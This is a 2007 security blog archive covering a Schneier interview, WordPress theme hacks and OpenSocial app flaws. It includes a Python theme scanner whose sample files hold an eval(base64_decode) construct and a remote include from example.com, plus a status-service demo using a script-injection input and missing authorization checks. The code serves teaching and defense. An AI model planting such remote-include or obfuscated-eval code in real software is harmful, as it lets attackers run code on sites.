Luminary Economics?

14 12 2007

There is a good interview with Bruce Schneier over at the Freakonomics blog. I am still working through it, but here are a couple of Q&A excerpts on questions I get asked a lot; I completely agree with the answers given:

“Q: So seriously, do you shop on Amazon, or anywhere else online for that matter?

A: Of course. I shop online all the time; it’s far easier than going to a store, or even calling a mail-order phone number, if I know exactly what I want. What you’re really asking me is about the security. No one steals credit card numbers one-by-one, by eavesdropping on the Internet connection. They’re all stolen in blocks of a million by hacking the back-end database. It doesn’t matter if you bought something over the Internet, by phone, by mail, or in person — you’re equally vulnerable.”

I cannot stress this enough! It doesn’t matter whether your purchases are online or offline; in reality they’re all online. All of our transactions go through computer systems, are stored in large databases, and are transmitted over networks. Look at the large security breaches in the news: many of them involve ‘offline’ purchases.

“Q: What was the one defining moment in your life that you knew you wanted to dedicate your life to computer security and cryptography?

A: I don’t know. Security is primarily a way of looking at the world, and I’ve always looked at the world that way. As a child, I always noticed security systems — in retail stores, in banks, in office buildings — and how to defeat them. I remember accompanying my mother to the voting booth, and noticing ways to break the security. So it’s less of a defining moment and more of a slow process.”

Security is a way of thinking. When interviewing candidates for information security roles, one of the things I look for beyond learned skills is how they think about problems. Specifically, a ‘security person’ thinks of different ways to break things. They think of ways to deconstruct the system and make it perform actions it was never intended to perform.

WordPress Hacking

27 11 2007

There have been some interesting posts around the net over the past week about WordPress blogs being hacked. The source vulnerabilities appear to be embedded within various WordPress themes created by outside developers.

There’s a pretty decent write-up on GigaOm. It’s good to see this kind of attention outside of the usual security crowds. Note: this blog runs on WordPress, which serves as a friendly reminder to review and understand the source code running on your site or application.

Update: It looks like some more blog hacking just made the news. Al Gore’s blog has been hacked. Les Orchard (a friend and former colleague of mine) appears to have had the same issue over at Decafbad.
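Following up on that reminder, here is an added example (not code from this post, from WordPress, or from any of the themes involved) of the kind of first-pass review a site owner can run over a theme before activating it: a Python script that walks a theme directory and flags constructs that rarely belong in an honest theme. The pattern list, the sample three-file theme it writes to a temporary directory, and the placeholder blob and example.com URL inside that sample are all constructed for the example.

```python
"""Added example: a reviewer's aid that walks a WordPress theme directory and
flags constructs that deserve a human look. Nothing here is from a real theme;
the sample theme is constructed below."""
import os
import re
import tempfile

# Constructs worth a second look in theme PHP. Matches are leads, not verdicts:
# a legitimate theme occasionally uses one of these, but a theme from an
# unknown developer normally has no business doing so.
SUSPICIOUS = [
    ("eval",               re.compile(r"\beval\s*\(")),
    ("decode-and-run",     re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("dynamic-function",   re.compile(r"\$\w+\s*\(")),            # $f(...): call through a variable
    ("remote-include",     re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://")),
    ("long-opaque-string", re.compile(r"['\"][A-Za-z0-9+/=]{80,}['\"]")),  # base64-looking blob
]


def scan_file(full_path, rel_path):
    """Return (rel_path, line_no, pattern_name, line) for every hit in one file."""
    hits = []
    with open(full_path, encoding="utf-8", errors="replace") as fh:
        for line_no, line in enumerate(fh, 1):
            for name, rx in SUSPICIOUS:
                if rx.search(line):
                    hits.append((rel_path, line_no, name, line.strip()))
    return hits


def scan_theme(theme_dir, exts=(".php",)):
    """Scan every PHP file under theme_dir; hits are ordered by path, then line."""
    hits = []
    for dirpath, _dirs, files in os.walk(theme_dir):
        for fname in files:
            if fname.endswith(exts):
                full = os.path.join(dirpath, fname)
                hits.extend(scan_file(full, os.path.relpath(full, theme_dir)))
    return sorted(hits, key=lambda h: (h[0], h[1]))


def build_sample_theme():
    """Write a constructed three-file theme to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="theme-")
    files = {
        # clean template: nothing to flag
        "header.php": "<?php wp_head(); ?>\n",
        # obfuscated footer: a placeholder blob (84 x 'A' standing in for a
        # base64 payload) is decoded and executed at page render time
        "footer.php": '<?php\n$k = "' + "A" * 84 + '";\neval(base64_decode($k));\n?>\n',
        # indirect call, then code pulled from a remote host (example.com is a reserved placeholder)
        "functions.php": '<?php\n$fn = "phpinfo";\n$fn();\ninclude("http://example.com/remote.txt");\n?>\n',
    }
    for name, body in files.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, line_no, name, text in scan_theme(build_sample_theme()):
        print(f"{rel}:{line_no}: [{name}] {text}")
```

Run it directly to list the findings for the sample theme, or call scan_theme() on a real theme directory. Every hit is a line to read by hand rather than proof of compromise; the value of the script is that it turns "review the theme" into a short list of specific lines to understand before the theme goes live.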

The OpenSocial Hacks

6 11 2007

So Google made a lot of news recently with their announcement of the OpenSocial API. The goal is to create a single set of APIs for application developers allowing them to build applications across multiple social networks such as Ning, LinkedIn, MySpace, Plaxo, etc. Tapping into the huge user base of these social networks with a single API should bring the time between application launch and having a significant user base down dramatically.

Since launching the API just a few days ago, there have already been two very public hacks of applications using it. The first hack was of an application that launched on the Plaxo network and was hacked within 45 minutes. The hack was by no means malicious and was carried out by a self-proclaimed amateur, TheHarmonyGuy. Here are the relevant stats from his blog:

Date: Friday, November 2, 2007

Initial hack: 45 minutes

Vulnerabilities:

  • Able to change current Emote status for any user
  • Able to access Emote history and current status for any user
  • Able to insert HTML, including JavaScript, into Emote pages

Coverage: TechCrunch

Progress: Plaxo has removed Emote from their whitelist. As of Nov. 6, Emote remains unpatched.

He has just followed this up with another innocuous hack of a new application using the API on the Ning platform. TheHarmonyGuy was able to access the friends of Ning founder Marc Andreessen through the iLike application. And of course, the posted stats of the hack:

Date: November 5, 2007

Initial hack: 20 minutes

Vulnerabilities:

  • Able to access listing of friends for any user and limited personal information about these friends
  • Able to add and remove playlist tracks for any user

Coverage: TechCrunch

Progress: Ning and iLike have both been notified. Ning has replied and stated they are working to fix the issues ASAP.

Update: Confirmed that the first vulnerability is a Ning issue, not an iLike issue. More details here.

It’s great to see the coverage and attention these hacks are getting from the non-security crowd. As you can see from the stats, TechCrunch has been giving TheHarmonyGuy a lot of attention. It reminds me a bit of the Adrian Lamo hacking events (here and here) of a few years ago. I am hoping the lessons learned from these public displays have a longer-lasting effect than Adrian Lamo’s did. It seems clear there was a big rush to get some of this code out (although, it turns out, the second hack is more of an issue with Ning than with OpenSocial) and some basic application security steps may have been skipped. Obviously this is not the first or last time for this.
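The first two Emote findings (changing or reading any user’s status by supplying their id) and the third (inserting HTML and JavaScript into Emote pages) map onto two of the most basic application security steps, and both are easy to show in code. The following is an added example, not Emote’s, Plaxo’s, Ning’s or OpenSocial’s code: a framework-free Python model of a status-update service with the vulnerable handlers beside hardened ones. The Store, Request and Forbidden names, the 140-character limit, and the alice/bob/mallory sample data are constructed for the example.

```python
"""Added example: a constructed status-update service (not Emote or any real
OpenSocial app) showing the two classes of flaw from the write-up above,
missing authorization and missing output encoding, next to their fixes."""
import html
from dataclasses import dataclass, field


@dataclass
class Request:
    session_user: str                            # identity established server-side at login
    params: dict = field(default_factory=dict)   # query/form data: entirely under the caller's control


class Store:
    """Constructed in-memory state standing in for the app's database."""
    def __init__(self):
        self.status = {"alice": "happy", "bob": "busy"}
        self.history = {"alice": ["happy"], "bob": ["busy"]}
        self.friends = {"alice": {"bob"}, "bob": {"alice"}, "mallory": set()}


class Forbidden(Exception):
    pass


# --- vulnerable handlers: the user id is taken from the request ------------

def set_status_vulnerable(store, req):
    """Whoever sends user_id=alice rewrites alice's status; the session is never consulted."""
    user = req.params["user_id"]
    store.status[user] = req.params["status"]
    store.history.setdefault(user, []).append(req.params["status"])
    return store.status[user]


def get_history_vulnerable(store, req):
    """Any caller can read any user's history."""
    return list(store.history.get(req.params["user_id"], []))


def render_status_vulnerable(store, user):
    """Status text lands in the page unencoded, so markup in it becomes live HTML/JavaScript."""
    return f"<p>{user}: {store.status[user]}</p>"


# --- hardened handlers -----------------------------------------------------

def set_status_fixed(store, req):
    """Only the logged-in user's own status can change; user_id in params is ignored."""
    user = req.session_user
    text = req.params["status"]
    if len(text) > 140:                          # constructed server-side length limit
        raise ValueError("status too long")
    store.status[user] = text
    store.history.setdefault(user, []).append(text)
    return text


def get_history_fixed(store, req):
    """History is visible to its owner and to the owner's friends, nobody else."""
    target = req.params["user_id"]
    viewer = req.session_user
    if viewer != target and viewer not in store.friends.get(target, set()):
        raise Forbidden(f"{viewer} may not read {target}'s history")
    return list(store.history.get(target, []))


def render_status_fixed(store, user):
    """Encode on output so stored text is displayed, never interpreted by the browser."""
    return f"<p>{html.escape(user)}: {html.escape(store.status[user])}</p>"


if __name__ == "__main__":
    hostile = Request("mallory", {"user_id": "alice", "status": "<script>alert(1)</script>"})
    s = Store()
    set_status_vulnerable(s, hostile)
    print("vulnerable:", render_status_vulnerable(s, "alice"))
    s = Store()
    set_status_fixed(s, hostile)
    print("fixed, alice untouched:", render_status_fixed(s, "alice"))
    print("fixed, mallory's own:  ", render_status_fixed(s, "mallory"))
```

The design point is that the fixed handlers never let request parameters decide whose data is touched: the acting identity comes only from the session, reads go through an explicit visibility rule, and encoding happens at output time so the same stored text is safe wherever it is displayed.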